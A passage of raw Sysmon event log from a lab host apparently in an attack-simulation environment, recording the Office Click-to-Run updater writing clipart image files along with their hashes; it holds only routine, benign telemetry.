Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0341559.JPGMD5=A8F243A39BBE961735811D363CFDD6B3,SHA256=862C138F613C5044EF69D6A0CF0819E55A061055FC069304C4C4AE7FE2472F91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066157Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0341557.JPGMD5=71FCACFB473092C8FC90F82E28ED869F,SHA256=6B1143B839441AAEA02CB7E4689A40E66C4F093E95A314CEC37EFE646C874AF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066156Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0341554.JPGMD5=E55ABE237B248FBCBA9094A09E882F6C,SHA256=04BD48DDBEB3FB8E706273F94C53B71FFC61E7BB8D196131DE68D0BA12FED55A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066155Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0341551.JPGMD5=47EA2D10E9BD0CEA24D7DA39FE2742EA,SHA256=AB85FA598F02B07C2688CAC33B7FBB8890E8C9173CB02165C044F65A4CDE8740,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066154Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0341534.JPGMD5=DB096457CAA41227550D44D352E82C54,SHA256=078268E03EE27F890D5FD42D5FE759F261669C3B37879B8ED43AD39C63F4F442,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066153Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0341499.JPGMD5=EF382F69D3B48603731A3B72E77AA603,SHA256=093A1FB7C8B76C6D582C637DE9534161EF75883108268BAFDA062AC11BDDB4DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066152Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0341475.JPGMD5=9E4E544D60B3A18786196D14E61CE710,SHA256=27A60872B54931EC993D11E4D4B84D0D349B67C69D278BCA3318E41A1D31352B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066151Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0341455.JPGMD5=AD115FDBE9FFF8ED8BBEB58F3B6318EA,SHA256=C754780D448B5BEFCA3092CB0E2917D65564A8FD438230D4405BB6258AFA5378,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066150Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0341448.JPGMD5=999DA44CE2E56AB51084F2E337CEB998,SHA256=BC83E9E69A17A79CAE927822D0896A80C0C485DF1FE2C83B8EB9008C10321D98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066149Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0341447.JPGMD5=09958BA999AF339763748AE2DA9F7F25,SHA256=6CA51A6B1CCAEAAC35F42B26C2BE35361A565CF49A6E8EC83251AA24CCFCD36A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066148Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0341439.JPGMD5=7343DA7C4E888E5A9972AFA5999D041E,SHA256=7514F1B7DA22B518B82F7288AE79DFAE1C86E8BDED6585FCEA661C3BE452BC1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066147Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0341344.JPGMD5=2F6A1A62860F13258C9EAC96869649B2,SHA256=D27F504889686B9ADB43303E185C9F3560F8FEF773EF4DDCBEEBFCF765C21B37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066146Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0341328.JPGMD5=6550D7BA1C4DE8F191200F04E2D23549,SHA256=B7127F7E2EAED63E37505A56DB3976547DF7BAAF36DFBC950A58761BD126E5D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066145Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0337280.JPGMD5=DDBF67BC2065E04AB04EC6724F63325E,SHA256=DB2A374AC78DA780827DA886B30D63BD5BA387AB14C61CCC90E016790C98CEC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066144Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0324704.WMFMD5=61A734E99E02E07C2CA7B6CEFE6DBD38,SHA256=FB0120A9372D843108B00874B4E407D3F0969646ACD87BDF4D47DBD7E6BE1C37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066143Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0324694.WMFMD5=8A72E7082DA7CD86BB3650C3814B25F5,SHA256=3F8FA47587C387DB34FD630AF75CBB1295B54CBC494570E337B7B422C0F0819A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066142Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0321179.JPGMD5=EEAC829825B676063D926A4DFCBF9CAB,SHA256=56D0AE50C41E393044BA9A1D8319315BD18D46FDAB49582991D3630EDEEA15C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066141Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0318810.WMFMD5=667FA231E90E319BFB3DC1457C6B6D9F,SHA256=A3CF437DB187E5B61B014A4D1F329E0322B6EB0A951DF458E85F2097AF8F0763,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066140Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0318804.WMFMD5=46AE6EA6224B4FE1E3A1C56B7D76FAC3,SHA256=CF41CCE602A638B1D179BC980EA439DC800DD1475B8EA72AD500A6DBFCD82FB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066139Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0318448.WMFMD5=F0AAD05C5730BBB1FD036EEDC8DAA0CA,SHA256=2F20C85B5D910CAF5C8FD1F975A3EF18B9B79EEDF57FFBEDCAB3A55AD0478285,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066138Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0315612.JPGMD5=E66BEFC40C71C940595CF9120190E318,SHA256=4C7C7D828BA1C8BB4EF834F58A2CC9A95026CA6200019FA29E734DC8365F58AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066137Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0315580.JPGMD5=CF4E4F320283470FD5908BCEFF534F7B,SHA256=B976BF4BE836F347AED3E43F2A796FBAA6287A3720DF6CFC6B0878F073AEAE80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066136Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0314068.JPGMD5=D3B69A4221BD332C258C75E08303E01A,SHA256=3A1F069FDE1478F5BA39D3330221720200002A7E4A4E212ADBCCFAD56FA9DEB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066135Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0313974.JPGMD5=959892624631AC7AB0CDC1179C1C73EA,SHA256=775D217D69EA53410B9F99EA54EA43BB71E5C0F91103700B2DA3F9087F93FEB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066134Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0313970.JPGMD5=D372DA5C926E7C8BCB17917C66C37144,SHA256=6CBB62B1C3F293DCC304B0D570A83B5D9A3EF6BCF99469C5D870153689FF9924,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066133Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0313965.JPGMD5=6D7A281A46EBB0A35589AB3F3E46E40D,SHA256=4E4AF6C162A46057CCDC9633D2702F605CF30BEFD6A4347224A3C22C177C470D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066132Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0313896.JPGMD5=57B5F329967C250BF090C2EA4BA9A627,SHA256=ACB0B3A9380C37EED038FF38DCE445C3F8475D16235D7550F0BBA7C8746BBB8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066131Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0309920.WMFMD5=867A01A7C638C6E40F1D3EE9567064FE,SHA256=718FEC0600E3A00B85C2646ED4E18CBBC6E09C100899AE3EA2A216FC550A8951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066130Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0309904.WMFMD5=DA80DC26A5FF5052FC50B8736813CB38,SHA256=E9153E79B8EC17D4FAC5E38DB6CB31C5B3627F5C3D01C04E77FE1740DD8B071A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066129Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0309902.WMFMD5=93F8811D355F74A079832B36131A65E9,SHA256=66382C2A5F4B4B931C5F5F5161286413E3ED69A13D36767716122E042E994B41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066128Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0309705.JPGMD5=CFFD8A90F980BC7620A9A860FAAE03AF,SHA256=9A9C69E5AB62953F65E1BBDA543201D1C891F4407E08EBE7297F5497DEADF332,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066127Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0309664.JPGMD5=4BD30832B692BEF81C67147F18B7BC54,SHA256=A05979C0AFB8B92E8BBE1319AF3F5DED60E27B8F0D4354E69B674431542B23C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066126Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0309598.JPGMD5=0EA73932E99D155B2397E080718A2D4B,SHA256=308CE1AA90C6E0F4E674A394B6B1D27D73E1641FFEED30F2E342A04E18693D45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066125Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0309585.JPGMD5=824F4D610BEE7DD087BC3884A976712C,SHA256=E823BBA8464E6E35DF544219D74FA8F681FC0A0CC610C39100219A3848E22A1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066124Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0309567.JPGMD5=43CFBF73B0ADEC4D46B689A4CBEE8CCE,SHA256=825299C1408A6DAA5ADA15E0C01F2607C90BBC8146B6F2DEA48E0880F8B30EAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066123Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0309480.JPGMD5=F25C14B8FA31D1219B7D26E416243AB0,SHA256=7FEB0F7C79E123BB4E6BD8AD7A3C77B61E7C039FFB05FB2688F9B1D9FD8A3405,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066122Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0304875.WMFMD5=91332F29EB87F22530E2BF5F18A68E4F,SHA256=F1585D90A88A4B078932FDA3F71D481AF656995D318827E821A7979157253303,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066121Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0304861.WMFMD5=74741E74AF299E1D4F5973CEE65483E0,SHA256=5F09C0F0D6F4CA5B0EAE374A20A21FB1DCA484734205E1830FEC7426B7D61BAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066120Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0304853.WMFMD5=81A182D43FF0ECCF1B895638B6290A34,SHA256=5D9D2683BAB87C7FB2CBDCBA70E7F622C1CEF9E59F459D46488DEFA551F3331A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066119Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0304405.WMFMD5=44B58D77992A82EF44C2160FB8CBCA3C,SHA256=B1EE866F05CC871ADF437D667480C3D4C5C65C8DAC102C39404E30EBB4654F9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066118Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0304371.WMFMD5=8C5159035DDC270C4971F62168478F60,SHA256=65714365FCF6D2B3DB2B1EEA7189D9017C57E925CF465B555D401029A7E91C70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066117Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0301432.WMFMD5=36CBC8BCB1B0FEF107773DBD6F8E4D87,SHA256=77EBA951DD59B771E0BAD7094A3AF11F42633405537350CBA4E1F95204D93F68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066116Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0301418.WMFMD5=BDEBAC0E128CB159FD0646290C4F4805,SHA256=6E3DFDED6A6C83DF66FC6441502B3067F1778C024BA4F70421A551B08AC8C54B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066115Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0301052.WMFMD5=C0B4E564E69E6BB3676267C3F6A3DFC6,SHA256=88E6DAE8A8E6447DC4A30BFD03E60B97DA619DCAA501FFDF98468FDCDA1D1E03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066114Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0301044.WMFMD5=D0A5578BE410F047EAD2D4002BC1434B,SHA256=82BFBAB167BDABBAA192C1828014C6AD7A5876E301CCE1ED93F1DD09843C9955,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066113Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program 